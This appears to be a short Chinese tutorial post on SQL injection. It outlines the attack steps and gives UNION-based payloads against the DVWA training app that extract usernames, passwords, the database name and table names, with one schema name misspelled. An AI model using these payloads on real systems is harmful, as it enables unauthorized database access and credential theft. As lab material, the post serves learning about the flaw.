SQL注入

SQL注入

类型
1.数字型注入
2.字符型注入
区别:字符型注入需要闭合单引号“ ’ ”,数字型不需要
SQL注入基本步骤

1)判断是否存在注入,注人是字符型还是数字型。
2)猜解SQL查询语句中的字段数及字段顺序。
3)获取当前数据库名。
4)获取数据库中的表名。
5)获取表中的字段名。
6)下载数据。

DVWA

low安全级别

  • 获取user及password
    'union select user,password from users
  • 尝试获取数据库名
    'union select user(),database()
  • 尝试获取数据库表名
    'union select 1,group_concat(table_name) from informaation_schema. tables where table_schema=database() #
    经查看低安全的服务器端代码可以发现->
    程序对来自客户端的参数id没有进行任何检查和过滤

你可能感兴趣的:(安全编程,sql)